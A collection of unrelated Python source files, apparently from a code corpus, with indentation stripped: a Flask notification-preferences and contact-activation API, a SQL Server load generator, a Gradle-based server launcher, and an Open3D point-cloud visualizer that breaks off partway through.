user_identity = get_jwt_identity()
user = User.find_by_username(user_identity)
if not user: raise Error.Forbidden()
preferences = NotificationPreferences.find_one(user.id)
alert_settings = NotificationAlertSettings.find_one(user.id)
asset_importance = NotificationAssetImportance.get_with(user.id)
dc_settings = NotificationDataCollectorSettings.find(user.id)
emails = NotificationAdditionalEmail.find(user.id)
phones = NotificationAdditionalTelephoneNumber.find(user.id)
emails = [item.to_dict() for item in emails]
phones = [item.to_dict() for item in phones]
preferences = preferences.to_dict(phones, emails)
alert_settings = alert_settings.to_dict()
dc_settings = [dc.to_dict() for dc in dc_settings]
if not asset_importance:
asset_importance = NotificationAssetImportance(user_id = user.id).save()
tag_list = NotificationPreferencesRepository.get_asset_tags(user.id)
response = {
'destinations': preferences,
'risks': alert_settings,
'asset_importance': [
{
'name': 'high',
'enabled': asset_importance.high,
},
{
'name': 'medium',
'enabled': asset_importance.medium,
},
{
'name': 'low',
'enabled': asset_importance.low,
},
],
'dataCollectors': dc_settings,
'asset_tags': [{
"id" : tag.id,
"name" : tag.name,
"color": tag.color
} for tag in tag_list]
}
return response, 200
@jwt_required
def put(self):
user_identity = get_jwt_identity()
user = User.find_by_username(user_identity)
if not user: raise Error.Forbidden()
body = json.loads(request.data)
parsed_result = NotificationPreferencesSchema().load(body).data
global activation_emails, activation_sms
activation_emails = []
activation_sms = []
# Update destinations
try:
destinations = parsed_result.get('destinations')
np = NotificationPreferences.find_one(user.id)
for destination in destinations:
attr = destination.get('destination')
if attr not in ('sms', 'push', 'email'):
LOG.error('Destination must be one these: sms, push, email. It\'s: {0}'.format(attr))
return {'error': 'Destination must be one these: sms, push, email'}, 400
setattr(np, attr, destination.get('enabled'))
if attr == 'sms' and destination.get('enabled'):
existing_phones = NotificationAdditionalTelephoneNumber.find(user.id)
for phone in existing_phones:
if len(list(filter(lambda item: item.get('id') == phone.id, destination.get('additional')))) == 0:
phone.delete()
for phone in destination.get('additional'):
id = phone.get('id')
phone = phone.get('phone')
if id:
filtered_phones = list(filter(lambda item: id == item.id, existing_phones))
if len(filtered_phones) == 0:
NotificationPreferences.rollback()
LOG.error('Not exist phone id {0}'.format(id))
return {'error': 'not exist id'}, 400
elif filtered_phones[0].phone != phone:
filtered_phones[0].phone = phone
filtered_phones[0].active = False
token = random_string(10)
filtered_phones[0].token = quote_plus(token)
filtered_phones[0].creation_date = datetime.now()
activation_sms.append({'phone': phone, 'token': filtered_phones[0].token})
else:
token = random_string(10)
token = quote_plus(token)
activation_sms.append({'phone': phone, 'token': token})
NotificationAdditionalTelephoneNumber(phone=phone, creation_date=datetime.now(), token = token, active = False, user_id = user.id).save() # Then change it to False
if attr == 'email' and destination.get('enabled'):
existing_emails = NotificationAdditionalEmail.find(user.id)
for email in existing_emails:
if len(list(filter(lambda item: item.get('id') == email.id, destination.get('additional')))) == 0:
email.delete()
for email in destination.get('additional'):
id = email.get('id')
email = email.get('email').lower()
if id:
filtered_emails = list(filter(lambda item: id == item.id, existing_emails))
if len(filtered_emails) == 0:
NotificationPreferences.rollback()
LOG.error('Not exist email id {0}'.format(id))
return {'error': 'not exist id'}, 400
elif filtered_emails[0].email != email:
filtered_emails[0].email = email
filtered_emails[0].active = False
token = random_string(10)
filtered_emails[0].token = quote_plus(token)
filtered_emails[0].creation_date = datetime.now()
activation_emails.append({'email': email, 'token': filtered_emails[0].token})
else:
token = random_string(10)
token = quote_plus(token)
activation_emails.append({'email': email, 'token': token})
NotificationAdditionalEmail(email=email, creation_date=datetime.now(), token = token, active = False, user_id = user.id).save()
# Update emails -> Delete removed, add new as pending, change to pending to updated
# Update phones ->Delete removed, add new as pending, change to pending to updated
# Update risks
risks = parsed_result.get('risks')
nas = NotificationAlertSettings.find_one(user.id)
for risk in risks:
attr = risk.get('name')
if attr not in ('high', 'medium', 'low', 'info'):
NotificationPreferences.rollback()
LOG.error('Risk must be one these: high, medium, low, info. But it\'s: {0}'.format(attr))
return {'error': 'Risk must be one these: high, medium, low, info'}, 400
setattr(nas, attr, risk.get('enabled'))
# Update asset importances
asset_importances = parsed_result.get('asset_importance')
nai = NotificationAssetImportance.get_with(user_id = user.id)
for importance in asset_importances:
attr = importance.get('name')
if attr not in ('high', 'medium', 'low'):
raise Error.BadRequest('Asset importance name must be one these: high, medium, low. But it\'s: {0}'.format(attr))
setattr(nai, attr, importance.get('enabled'))
# Update asset tags
asset_tags = parsed_result.get('asset_tags')
tag_id_list = [tag.get('id') for tag in asset_tags]
NotificationPreferencesRepository.set_asset_tags(user.id, tag_id_list, False)
# Update data collectors. Check if dc belongs to user organization
data_collectors = parsed_result.get('data_collectors')
for dcp in data_collectors:
dc = DataCollector.find_by_id(dcp.get('data_collector_id'))
if dc and dc.organization_id != user.organization_id:
NotificationPreferences.rollback()
return None, 403
if dc:
settings = NotificationDataCollectorSettings.find_one(user_id = user.id, data_collector_id = dc.id)
if dc and settings:
settings.enabled = dcp.get('enabled')
NotificationPreferences.commit()
thread = Thread(target = send_activation_emails)
thread.setDaemon(True)
thread.start()
thread = Thread(target = send_activation_sms)
thread.setDaemon(True)
thread.start()
except Exception as exc:
NotificationPreferences.rollback()
LOG.error(exc)
return {'error': 'Something went wrong'}, 500
class NotificationEmailActivationAPI(Resource):
def put(self, token):
email = NotificationAdditionalEmail.find_one_by_token(token)
if not email:
return None, 404
if email.active:
return {'code': 'EMAIL_ALREADY_ACTIVE'}, 400
if email.creation_date + timedelta(hours=24) < datetime.now():
return {'code': 'DISABLED_TOKEN'}
email.active = True
email.update()
return {'email': email.email}, 200
class NotificationPhoneActivationAPI(Resource):
def put(self, token):
phone = NotificationAdditionalTelephoneNumber.find_one_by_token(token)
if not phone:
return None, 404
if phone.active:
return {'code': 'PHONE_ALREADY_ACTIVE'}, 400
if phone.creation_date + timedelta(hours=24) < datetime.now():
return {'code': 'DISABLED_TOKEN'}
phone.active = True
phone.update()
return {'phone': phone.phone}, 200
def send_activation_emails():
if config.SEND_EMAILS:
with app.app_context():
server = smtplib.SMTP(config.SMTP_HOST, config.SMTP_PORT)
#server.set_debuglevel(1)
server.ehlo()
server.starttls()
#stmplib docs recommend calling ehlo() before & after starttls()
server.ehlo()
server.login(config.SMTP_USERNAME, config.SMTP_PASSWORD)
msg = MIMEMultipart('alternative')
msg['Subject'] = f"{config.BRAND_NAME} Email Confirmation"
msg['From'] = email.utils.formataddr((config.SMTP_SENDER_NAME, config.SMTP_SENDER))
for item in activation_emails:
token = item.get('token')
email_user = item.get('email')
full_url = config.BRAND_URL + "notifications/email_activation/" + str(token)
print('init email sending')
msg['To'] = email_user
part = MIMEText(render_template(
'notification_activation.html',
brand_name=config.BRAND_NAME,
full_url=full_url
),'html')
msg.attach(part)
server.sendmail(config.SMTP_SENDER,email_user, msg.as_string())
print("finished email sending")
server.close()
def send_activation_sms():
if config.SEND_SMS:
sns = boto3.client('sns')
for item in activation_sms:
token = item.get('token')
phone = item.get('phone')
full_url = config.BRAND_URL + "notifications/phone_activation/" + str(token)
sns.publish(
PhoneNumber=phone,
Message=f'Please activate this phone to receive {config.BRAND_NAME} notifications by clicking the link ' + full_url,
)
def random_string(length):
"""Generate a random string with the combination of lowercase and uppercase letters """
letters = string.ascii_letters
return ''.join(random.choice(letters) for i in range(length))
|
load_generator.py
|
import pyodbc
import os
from multiprocessing import Process
def get_file_content(full_path):
"""Get file content function from read_sql_files_to_db.py"""
print(full_path)
bytes = min(32, os.path.getsize(full_path))
raw = open(full_path, 'rb').read(bytes)
if '\\xff\\xfe' in str(raw):
print("file is utf-16")
the_file = open(full_path, encoding="utf-16",
errors="backslashreplace")
data = the_file.read()
else:
print("file is latin-1")
the_file = open(full_path, encoding="latin-1",
errors="backslashreplace")
data = the_file.read()
return data
def update_database_data():
cnxn = pyodbc.connect('Driver={SQL Server};'
'Server=localhost;'
'Database=ravexdemo6;'
'Trusted_Connection=yes;queryTimeout=60', autocommit=True)
thesql = get_file_content("C:\\Users\\jong\\Documents\\GitHub\\data-projects\\python\\load_generator\\generate_load.sql")
cursor = cnxn.cursor()
cursor.execute(thesql)
cursor.close
cnxn.close
if __name__ == '__main__':
update_database_data()
# p1 = Process(target=update_database_data)
# p1.start()
# p2 = Process(target=update_database_data)
# p2.start()
# p3 = Process(target=update_database_data)
# p3.start()
# p4 = Process(target=update_database_data)
# p4.start()
# p5 = Process(target=update_database_data)
# p5.start()
# p1.join()
# p2.join()
# p3.join()
# p4.join()
# p5.join()
|
server_controller.py
|
import subprocess
import sys
import functools
import os.path as path
from threading import Thread
from queue import Queue, Empty
module_dir = path.abspath(path.join(path.dirname(__file__)))
_root_dir = path.abspath(path.join(module_dir, '..'))
class StdOutReader:
def __init__(self, stream, verbose=False):
self._stream = stream
self._queue = Queue()
def _reader(s, queue, verbose):
while True:
line = s.readline()
s.flush()
if line:
if verbose:
print(line)
queue.put(line)
self._thread = Thread(target=_reader, args=(self._stream, self._queue, verbose))
self._thread.daemon = True
self._thread.start()
def readline(self):
try:
return str(self._queue.get(block=False, timeout=0.1))
except Empty:
return ''
class Initializer:
def __init__(self, project):
cmd = self._cmd_for_task(project, 'assembleDist', 'installDist')
print("gradle cmd: {}".format(cmd))
project_module_dir = path.abspath(path.join(_root_dir, project))
self._init_script = path.join(project_module_dir,
'build/install/{}/bin/{}'.format(project, project))
if subprocess.call(cmd, shell=True) == 0 and path.exists(self._init_script):
print('assembleDist installDist success')
else:
print('assembleDist installDist failed')
sys.exit(1)
def _cmd_for_task(self, project, *tasks):
template = ':{}:{}'
t = functools.reduce(lambda a, b: ("", template.format(project, a) + " " + template.format(project, b)), tasks)[1]
return "{}/gradlew -p {} {}".format(_root_dir, _root_dir, t)
@property
def init_script(self):
return self._init_script
class Server:
def __init__(self, script, ready_str, *args, **kwargs):
self._port = kwargs.get('port', '')
host = kwargs.get('host', '')
self._name = kwargs.get('name', 'unnamed')
self._verbose = kwargs.get('verbose', False)
if len(args) > 1:
argv = functools.reduce(lambda a, b: ("", str(a).strip() + " " + str(b).strip()), args)[1]
elif len(args) is 1:
argv = str(args[0]).strip()
else:
argv = ''
self.cmd = "{} {} {} {} {}".format(script, host, self.port, self.name, argv)
self.process = None
self.ready_str = ready_str
@property
def port(self):
return str(self._port)
@property
def name(self):
return str(self._name)
def run(self):
if self.process is None:
print("server start cmd: {}".format(self.cmd))
self.process = subprocess.Popen("exec " + self.cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
nb_err = StdOutReader(self.process.stderr, verbose=self._verbose)
nb_out = StdOutReader(self.process.stdout, verbose=self._verbose)
while True:
if self.ready_str in nb_err.readline() or self.ready_str in nb_out.readline():
break
return self
def kill(self):
if self.process is not None:
self.process.kill()
|
visualizer.py
|
import math
import numpy as np
import threading
import open3d as o3d
from open3d.visualization import gui
from open3d.visualization import rendering
from collections import deque
from .boundingbox import *
from .colormap import *
from .labellut import *
import time
class Model:
"""The class that helps build visualization models based on attributes, data, and methods."""
bounding_box_prefix = "Bounding Boxes/"
class BoundingBoxData:
"""The class to define a bounding box that is used to describe the target location.
**Args:**
name: The name of the pointcloud array.
boxes: The array of pointcloud that define the bounding box.
"""
def __init__(self, name, boxes):
self.name = name
self.boxes = boxes
def __init__(self):
# Note: the tpointcloud cannot store the actual data arrays, because
# the tpointcloud requires specific names for some arrays (e.g. "points",
# "colors"). So the tpointcloud exists for rendering and initially only
# contains the "points" array.
self.tclouds = {} # name -> tpointcloud
self.data_names = [] # the order data will be displayed / animated
self.bounding_box_data = [] # [BoundingBoxData]
self._data = {} # name -> {attr_name -> numpyarray}
self._known_attrs = {} # name -> set(attrs)
self._attr2minmax = {} # only access in _get_attr_minmax()
self._attr_rename = {"label": "labels", "feat": "feature"}
def _init_data(self, name):
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
self.data_names.append(name)
"""Check if the data is loaded."""
def is_loaded(self, name):
if name in self._data:
return len(self._data[name]) > 0
else:
# if the name isn't in the data, presumably it is loaded
# (for instance, if this is a bounding box).
return True
"""If data is not loaded, then load the data."""
def load(self, name, fail_if_no_space=False):
assert (False) # pure virtual
def unload(self, name):
assert (False) # pure virtual
"""Create a point cloud based on the data provided. The data should include name and points."""
def create_point_cloud(self, data):
assert ("name" in data) # name is a required field
assert ("points" in data) # 'points' is a required field
name = data["name"]
pts = self._convert_to_numpy(data["points"])
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
known_attrs = set()
if pts.shape[1] >= 4:
# We can't use inplace Tensor creation (e.g. from_numpy())
# because the resulting arrays won't be contiguous. However,
# TensorList can be inplace.
xyz = pts[:, [0, 1, 2]]
tcloud.point["points"] = Visualizer._make_tcloud_array(xyz,
copy=True)
else:
tcloud.point["points"] = Visualizer._make_tcloud_array(pts)
self.tclouds[name] = tcloud
# Add scalar attributes and vector3 attributes
attrs = {}
for k, v in data.items():
attr = self._convert_to_numpy(v)
if attr is None:
continue
attr_name = k
if attr_name == "point":
continue
new_name = self._attr_rename.get(attr_name)
if new_name is not None:
attr_name = new_name
if len(attr.shape) == 1 or len(attr.shape) == 2:
attrs[attr_name] = attr
known_attrs.add(attr_name)
self._data[name] = attrs
self._known_attrs[name] = known_attrs
def _convert_to_numpy(self, ary):
if isinstance(ary, list):
try:
return np.array(ary, dtype='float32')
except TypeError:
return None
elif isinstance(ary, np.ndarray):
if len(ary.shape) == 2 and ary.shape[0] == 1:
ary = ary[0] # "1D" array as 2D: [[1, 2, 3,...]]
if ary.dtype.name.startswith('int'):
return np.array(ary, dtype='float32')
else:
return ary
try:
import tensorflow as tf
if isinstance(ary, tf.Tensor):
return self._convert_to_numpy(ary.numpy())
except:
pass
try:
import torch
if isinstance(ary, torch.Tensor):
return self._convert_to_numpy(ary.detach().cpu().numpy())
except:
pass
return None
"""Get an attribute from data based on the name passed."""
def get_attr(self, name, attr_name):
if name in self._data:
attrs = self._data[name]
if attr_name in attrs:
return attrs[attr_name]
return None
"""Get a shape from data based on the name passed."""
def get_attr_shape(self, name, attr_name):
attr = self.get_attr(name, attr_name)
if attr is not None:
return attr.shape
return []
"""Get the minimum and maximum for an attribute."""
def get_attr_minmax(self, attr_name, channel):
attr_key_base = attr_name + ":" + str(channel)
attr_min = 1e30
attr_max = -1e30
for name in self._data.keys():
key = name + ":" + attr_key_base
if key not in self._attr2minmax:
attr = self.get_attr(name, attr_name)
if attr is None: # clouds may not have all the same attributes
continue
if len(attr.shape) > 1:
attr = attr[:, channel]
self._attr2minmax[key] = (attr.min(), attr.max())
amin, amax = self._attr2minmax[key]
attr_min = min(attr_min, amin)
attr_max = max(attr_max, amax)
if attr_min > attr_max:
return (0.0, 0.0)
return (attr_min, attr_max)
"""Get a list of attributes based on the name."""
def get_available_attrs(self, names):
attr_names = None
for n in names:
known = self._known_attrs.get(n)
if known is not None:
if attr_names is None:
attr_names = known
else:
attr_names = attr_names.intersection(known)
if attr_names is None:
return []
return sorted(attr_names)
"""Calculate the bounds for a pointcloud."""
def calc_bounds_for(self, name):
if name in self.tclouds and not self.tclouds[name].is_empty():
tcloud = self.tclouds[name]
# Ideally would simply return tcloud.compute_aabb() here, but it can
# be very slow on macOS with clang 11.0
pts = tcloud.point["points"].numpy()
min_val = (pts[:, 0].min(), pts[:, 1].min(), pts[:, 2].min())
max_val = (pts[:, 0].max(), pts[:, 1].max(), pts[:, 2].max())
return [min_val, max_val]
else:
return [(0.0, 0.0, 0.0), (0.0, 0.0, 0.0)]
class DataModel(Model):
"""The class for data i/o and storage of visualization.
**Args:**
userdata: The dataset to be used in the visualization.
"""
def __init__(self, userdata):
super().__init__()
# We could just create the TPointCloud here, but that would cause the UI
# to block. If we do it on load then the loading dialog will display.
self._name2srcdata = {}
for d in userdata:
name = d["name"]
while name in self._data: # ensure each name is unique
name = name + "_"
self._init_data(name)
self._name2srcdata[name] = d
"""Load a pointcloud based on the name provided."""
def load(self, name, fail_if_no_space=False):
if self.is_loaded(name):
return
self.create_point_cloud(self._name2srcdata[name])
"""Unload a pointcloud."""
def unload(self, name):
pass
class DatasetModel(Model):
"""The class used to manage a dataset model.
**Args:**
dataset: The 3D ML dataset to use. You can use the base dataset, sample datasets , or a custom dataset.
split: A string identifying the dataset split that is usually one of 'training', 'test', 'validation', or 'all'.
indices: The indices to be used for the datamodel. This may vary based on the split used.
"""
def __init__(self, dataset, split, indices):
super().__init__()
self._dataset = None
self._name2datasetidx = {}
self._memory_limit = 8192 * 1024 * 1024 # memory limit in bytes
self._current_memory_usage = 0
self._cached_data = deque()
self._dataset = dataset.get_split(split)
if len(self._dataset) > 0:
if indices is None:
indices = range(0, len(self._dataset))
# Some results from get_split() (like "training") are randomized.
# Sort, so that the same index always returns the same piece of data.
path2idx = {}
for i in range(0, len(self._dataset.path_list)):
path2idx[self._dataset.path_list[i]] = i
real_indices = [path2idx[p] for p in sorted(path2idx.keys())]
indices = [real_indices[idx] for idx in indices]
# SemanticKITTI names its items <sequence#>_<timeslice#>,
# "mm_nnnnnn". We'd like to use the hierarchical feature of the tree
# to separate the sequences. We cannot change the name in the dataset
# because this format is used to report algorithm results, so do it
# here.
underscore_to_slash = False
if dataset.__class__.__name__ == "SemanticKITTI":
underscore_to_slash = True
for i in indices:
info = self._dataset.get_attr(i)
name = info["name"]
if underscore_to_slash:
name = name.replace("_", "/")
while name in self._data: # ensure each name is unique
name = name + "_"
self._init_data(name)
self._name2datasetidx[name] = i
if dataset.__class__.__name__ in [
"Toronto3D", "Semantic3D", "S3DIS"
]:
self._attr_rename["feat"] = "colors"
self._attr_rename["feature"] = "colors"
else:
print("[ERROR] Dataset split has no data")
"""Check if the data is loaded."""
def is_loaded(self, name):
loaded = super().is_loaded(name)
if loaded and name in self._cached_data:
# make this point cloud the most recently used
self._cached_data.remove(name)
self._cached_data.append(name)
return loaded
"""If data is not loaded, then load the data."""
def load(self, name, fail_if_no_space=False):
assert (name in self._name2datasetidx)
if self.is_loaded(name):
return True
idx = self._name2datasetidx[name]
data = self._dataset.get_data(idx)
data["name"] = name
data["points"] = data["point"]
if 'bounding_boxes' in data:
self.bounding_box_data.append(
Model.BoundingBoxData(name, data['bounding_boxes']))
self.create_point_cloud(data)
size = self._calc_pointcloud_size(self._data[name], self.tclouds[name])
if size + self._current_memory_usage > self._memory_limit:
if fail_if_no_space:
self.unload(name)
return False
else:
# Remove oldest from cache
remove_name = self._cached_data.popleft()
remove_size = self._calc_pointcloud_size(
self._data[remove_name], self.tclouds[remove_name])
self._current_memory_usage -= remove_size
self.unload(remove_name)
# Add new point cloud to cache
self._cached_data.append(name)
self._current_memory_usage += size
return True
else:
self._current_memory_usage += size
self._cached_data.append(name)
return True
def _calc_pointcloud_size(self, raw_data, pcloud):
pcloud_size = 0
for (attr, arr) in raw_data.items():
pcloud_size += arr.size * 4
# Point cloud consumes 64 bytes of per point of GPU memory
pcloud_size += pcloud.point["points"].num_elements() * 64
return pcloud_size
"""Unload the data (only if you have loaded it earlier)."""
def unload(self, name):
# Only unload if this was loadable; we might have an in-memory,
# user-specified data created directly through create_point_cloud().
if name in self._name2datasetidx:
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
bbox_name = Model.bounding_box_prefix + name
for i in range(0, len(self.bounding_box_data)):
if self.bounding_box_data[i].name == bbox_name:
self.bounding_box_data.pop(i)
break
class Visualizer:
"""The visualizer class for dataset objects and custom point clouds."""
class LabelLUTEdit:
"""This class includes functionality for managing a labellut (label look-up-table)."""
def __init__(self):
self.widget = gui.TreeView()
self._on_changed = None # takes no args, returns no value
self.clear()
"""Clears the look-up table."""
def clear(self):
self.widget.clear()
self._label2color = {}
"""Checks if the look-up table is empty."""
def is_empty(self):
return len(self._label2color) == 0
"""Returns a list of label keys."""
def get_colors(self):
return [
self._label2color[label]
for label in sorted(self._label2color.keys())
]
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
"""Updates the labels based on look-up table passsed."""
def set_labels(self, labellut):
self.widget.clear()
root = self.widget.get_root_item()
for key in sorted(labellut.labels.keys()):
lbl = labellut.labels[key]
color = lbl.color
if len(color) == 3:
color += [1.0]
self._label2color[key] = color
color = gui.Color(lbl.color[0], lbl.color[1], lbl.color[2])
cell = gui.LUTTreeCell(
str(key) + ": " + lbl.name, True, color, None, None)
cell.checkbox.set_on_checked(
self._make_on_checked(key, self._on_label_checked))
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(key,
self._on_label_color_changed))
self.widget.add_item(root, cell)
def _make_on_color_changed(self, label, member_func):
def on_changed(color):
member_func(label, color)
return on_changed
def _on_label_color_changed(self, label, gui_color):
self._label2color[label] = [
gui_color.red, gui_color.green, gui_color.blue,
self._label2color[label][3]
]
if self._on_changed is not None:
self._on_changed()
def _make_on_checked(self, label, member_func):
def on_checked(checked):
member_func(label, checked)
return on_checked
def _on_label_checked(self, label, checked):
if checked:
alpha = 1.0
else:
alpha = 0.0
color = self._label2color[label]
self._label2color[label] = [color[0], color[1], color[2], alpha]
if self._on_changed is not None:
self._on_changed()
class ColormapEdit:
"""This class is used to create a color map for visualization of points."""
def __init__(self, window, em):
self.colormap = None
self.widget = gui.Vert()
self._window = window
self._min_value = 0.0
self._max_value = 1.0
self._on_changed = None # takes no args, no return value
self._itemid2idx = {}
self._min_label = gui.Label("")
self._max_label = gui.Label("")
grid = gui.VGrid(2)
grid.add_child(gui.Label("Range (min):"))
grid.add_child(self._min_label)
grid.add_child(gui.Label("Range (max):"))
grid.add_child(self._max_label)
self.widget.add_child(grid)
self.widget.add_fixed(0.5 * em)
self.widget.add_child(gui.Label("Colormap"))
self._edit = gui.TreeView()
self._edit.set_on_selection_changed(self._on_selection_changed)
self.widget.add_child(self._edit)
self._delete = gui.Button("Delete")
self._delete.horizontal_padding_em = 0.5
self._delete.vertical_padding_em = 0
self._delete.set_on_clicked(self._on_delete)
self._add = gui.Button("Add")
self._add.horizontal_padding_em = 0.5
self._add.vertical_padding_em = 0
self._add.set_on_clicked(self._on_add)
h = gui.Horiz()
h.add_stretch()
h.add_child(self._delete)
h.add_fixed(0.25 * em)
h.add_child(self._add)
h.add_stretch()
self.widget.add_fixed(0.5 * em)
self.widget.add_child(h)
self.widget.add_fixed(0.5 * em)
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
"""Updates the colormap based on the minimum and maximum values passed."""
def update(self, colormap, min_val, max_val):
self.colormap = colormap
self._min_value = min_val
self._max_value = max_val
self._min_label.text = str(min_val)
self._max_label.text = str(max_val)
if self._min_value >= self._max_value:
self._max_value = self._min_value + 1.0
self._edit.clear()
self._itemid2idx = {}
root_id = self._edit.get_root_item()
for i in range(0, len(self.colormap.points)):
p = self.colormap.points[i]
color = gui.Color(p.color[0], p.color[1], p.color[2])
val = min_val + p.value * (max_val - min_val)
cell = gui.ColormapTreeCell(val, color, None, None)
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(i, self._on_color_changed))
cell.number_edit.set_on_value_changed(
self._make_on_value_changed(i, self._on_value_changed))
item_id = self._edit.add_item(root_id, cell)
self._itemid2idx[item_id] = i
self._update_buttons_enabled()
def _make_on_color_changed(self, idx, member_func):
def on_changed(color):
member_func(idx, color)
return on_changed
def _on_color_changed(self, idx, gui_color):
self.colormap.points[idx].color = [
gui_color.red, gui_color.green, gui_color.blue
]
if self._on_changed is not None:
self._on_changed()
def _make_on_value_changed(self, idx, member_func):
def on_changed(value):
member_func(idx, value)
return on_changed
def _on_value_changed(self, idx, value):
value = (value - self._min_value) / (self._max_value -
self._min_value)
needs_update = False
value = min(1.0, max(0.0, value))
if ((idx > 0 and value < self.colormap.points[idx - 1].value) or
(idx < len(self.colormap.points) - 1 and
value > self.colormap.points[idx + 1].value)):
self.colormap.points[idx].value = value
o = self.colormap.points[idx]
self.colormap.points.sort(key=lambda cmap_pt: cmap_pt.value)
for i in range(0, len(self.colormap.points)):
if self.colormap.points[i] is o:
idx = i
break
needs_update = True
if idx > 0 and value == self.colormap.points[idx - 1].value:
if idx < len(self.colormap.points):
upper = self.colormap.points[idx + 1].value
else:
upper = 1.0
value = value + 0.5 * (upper - value)
needs_update = True
if idx < len(self.colormap.points
) - 1 and value == self.colormap.points[idx + 1].value:
if idx > 0:
lower = self.colormap.points[idx - 1].value
else:
lower = 0.0
value = lower + 0.5 * (value - lower)
needs_update = True
self.colormap.points[idx].value = value
if needs_update:
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_selection_changed(self, item_id):
self._update_buttons_enabled()
def _on_delete(self):
if len(self.colormap.points) > 2:
idx = self._itemid2idx[self._edit.selected_item]
self.colormap.points = self.colormap.points[:
idx] + self.colormap.points[
idx + 1:]
del self._itemid2idx[self._edit.selected_item]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_add(self):
if self._edit.selected_item in self._itemid2idx: # maybe no selection
idx = self._itemid2idx[self._edit.selected_item]
if idx < len(self.colormap.points) - 1:
lower = self.colormap.points[idx]
upper = self.colormap.points[idx + 1]
else:
lower = self.colormap.points[len(self.colormap.points) - 2]
upper = self.colormap.points[len(self.colormap.points) - 1]
add_idx = min(idx + 1, len(self.colormap.points) - 1)
new_value = lower.value + 0.5 * (upper.value - lower.value)
new_color = [
0.5 * lower.color[0] + 0.5 * upper.color[0],
0.5 * lower.color[1] + 0.5 * upper.color[1],
0.5 * lower.color[2] + 0.5 * upper.color[2]
]
new_point = Colormap.Point(new_value, new_color)
self.colormap.points = self.colormap.points[:add_idx] + [
new_point
] + self.colormap.points[add_idx:]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _update_buttons_enabled(self):
if self._edit.selected_item in self._itemid2idx:
self._delete.enabled = len(self.colormap.points) > 2
self._add.enabled = True
else:
self._delete.enabled = False
self._add.enabled = False
def _update_later(self):
def update():
self.update(self.colormap, self._min_value, self._max_value)
self._window.post_redraw() # need to manually request redraw
gui.Application.instance.post_to_main_thread(self._window, update)
class ProgressDialog:
"""This class is used to manage the progress dialog displayed during visualization.
Initialize the class.
**Args:**
title: The title of the dialog box.
window: The window where the progress dialog box should be displayed.
n_items: The maximum number of items.
"""
def __init__(self, title, window, n_items):
self._window = window
self._n_items = n_items
em = window.theme.font_size
self.dialog = gui.Dialog(title)
self._label = gui.Label(title + " ")
self._layout = gui.Vert(0, gui.Margins(em, em, em, em))
self.dialog.add_child(self._layout)
self._layout.add_child(self._label)
self._layout.add_fixed(0.5 * em)
self._progress = gui.ProgressBar()
self._progress.value = 0.0
self._layout.add_child(self._progress)
"""Set the label text on the dialog box."""
def set_text(self, text):
self._label.text = text + " "
"""Post updates to the main thread."""
def post_update(self, text=None):
if text is None:
gui.Application.instance.post_to_main_thread(
self._window, self.update)
else:
def update_with_text():
self.update()
self._label.text = text
gui.Application.instance.post_to_main_thread(
self._window, update_with_text)
"""Enumerate the progress in the dialog box."""
def update(self):
value = min(1.0, self._progress.value + 1.0 / self._n_items)
self._progress.value = value
SOLID_NAME = "Solid Color"
LABELS_NAME = "Label Colormap"
RAINBOW_NAME = "Colormap (Rainbow)"
GREYSCALE_NAME = "Colormap (Greyscale)"
COLOR_NAME = "RGB"
X_ATTR_NAME = "x position"
Y_ATTR_NAME = "y position"
Z_ATTR_NAME = "z position"
def __init__(self):
self._objects = None
self._name2treenode = {}
self._name2treeid = {}
self._treeid2name = {}
self._attrname2lut = {}
self._colormaps = {}
self._shadername2panelidx = {}
self._gradient = rendering.Gradient()
self._scalar_min = 0.0
self._scalar_max = 1.0
self._animation_frames = []
self._last_animation_time = time.time()
self._animation_delay_secs = 0.100
self._consolidate_bounding_boxes = False
self._dont_update_geometry = False
def _init_dataset(self, dataset, split, indices):
self._objects = DatasetModel(dataset, split, indices)
def _init_data(self, data):
self._objects = DataModel(data)
def _init_user_interface(self, title, width, height):
self.window = gui.Application.instance.create_window(
title, width, height)
self.window.set_on_layout(self._on_layout)
em = self.window.theme.font_size
self._3d = gui.SceneWidget()
self._3d.enable_scene_caching(True) # makes UI _much_ more responsive
self._3d.scene = rendering.Open3DScene(self.window.renderer)
self.window.add_child(self._3d)
self._panel = gui.Vert()
self.window.add_child(self._panel)
indented_margins = gui.Margins(em, 0, em, 0)
# View controls
ctrl = gui.CollapsableVert("Mouse Controls", 0, indented_margins)
arcball = gui.Button("Arcball")
arcball.set_on_clicked(self._on_arcball_mode)
arcball.horizontal_padding_em = 0.5
arcball.vertical_padding_em = 0
fly = gui.Button("Fly")
fly.set_on_clicked(self._on_fly_mode)
fly.horizontal_padding_em = 0.5
fly.vertical_padding_em = 0
reset = gui.Button("Re-center")
reset.set_on_clicked(self._on_reset_camera)
reset.horizontal_padding_em = 0.5
reset.vertical_padding_em = 0
h = gui.Horiz(0.25 * em)
h.add_stretch()
h.add_child(arcball)
h.add_child(fly)
h.add_fixed(em)
h.add_child(reset)
h.add_stretch()
ctrl.add_child(h)
ctrl.add_fixed(em)
self._panel.add_child(ctrl)
# Dataset
model = gui.CollapsableVert("Dataset", 0, indented_margins)
vgrid = gui.VGrid(2, 0.25 * em)
model.add_child(vgrid)
model.add_fixed(0.5 * em)
bgcolor = gui.ColorEdit()
bgcolor.color_value = gui.Color(1, 1, 1)
self._on_bgcolor_changed(bgcolor.color_value)
bgcolor.set_on_value_changed(self._on_bgcolor_changed)
vgrid.add_child(gui.Label("BG Color"))
vgrid.add_child(bgcolor)
view_tab = gui.TabControl()
view_tab.set_on_selected_tab_changed(self._on_display_tab_changed)
model.add_child(view_tab)
# ... model list
self._dataset = gui.TreeView()
self._dataset.set_on_selection_changed(
self._on_dataset_selection_changed)
view_tab.add_tab("List", self._dataset)
# ... animation slider
v = gui.Vert()
view_tab.add_tab("Animation", v)
v.add_fixed(0.25 * em)
